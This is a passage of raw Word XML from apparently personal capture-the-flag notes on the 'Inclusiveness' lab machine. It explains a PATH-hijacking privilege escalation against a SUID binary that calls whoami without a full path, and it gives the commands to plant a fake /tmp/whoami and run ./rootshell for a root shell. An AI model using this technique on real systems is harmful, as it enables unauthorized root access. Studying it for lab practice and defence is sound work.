    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002679">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1mr25cl151n8" w:id="339"/>
      <w:bookmarkEnd w:id="339"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One example with root cron job calling whoami without full path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId806">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Inclusiveness</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw a C script (on target machine) that runs the "whoami" command and if it returns "tom," then it will open a shell as root since the SUID of the executable is set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000267F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002680">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the process:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Upon checking the/home/tom directory, I found an interesting file rootshell.c file and a compile file rootshell that owns SUID permissions.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002681">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2260600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="303" name="image298.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image298.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId807"/>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2682">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002683">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3795615" cy="3576638"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="258" name="image254.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image254.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId808"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3795615" cy="3576638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002684">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">popen("whoami", "r")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs the whoami command and opens a pipe to read its output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002685">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fgets(user, 80, f) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reads the output (e.g., "tom\n") into the user buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002686">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strncmp(user, "tom", 3)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks if the output starts with "tom".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002687">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the user is "tom":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(geteuid())</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: sets real UID to effective UID (usually root if SUID-bit is set and the file is owned by root).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002689">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execlp("sh", "sh", (char *)0)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: launches a shell (sh) with those privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this binary is owned by root and has the SUID bit set, then any code inside it (after calling setuid(geteuid())) executes with root privileges, since SUID allows you to run files with the permissions of the owner of the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The critical issue is here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">popen("whoami", "r");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000268F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002690">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It does not use the full path (/usr/bin/whoami). It just calls whoami, which means it relies on the system's PATH to find the executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002691">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002692">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And importantly, if you check with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type -a whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you see no mentions of shell built-in, meaning that it depends on PATH to find binary. If it said "shell builtin" then that means it doesn't depend on PATH and is not hijackable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002693">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002694">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if an attacker can control the PATH, they can trick the program into running a malicious version of whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002695">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002696">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002697">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Create a fake whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002698">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002699">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'echo tom' &gt; /tmp/whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now /tmp/whoami is an executable that simply prints "tom", tricking the program into thinking you're user tom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Prepend /tmp to PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000269F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=/tmp:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means when the program calls whoami, it looks in /tmp first and runs your script instead of the real /usr/bin/whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Execute the vulnerable binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="500"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If rootshell has the SUID bit set and is owned by root, you'll now get a root shell, because:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your fake whoami prints "tom"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The check passes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(geteuid()) gives you root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
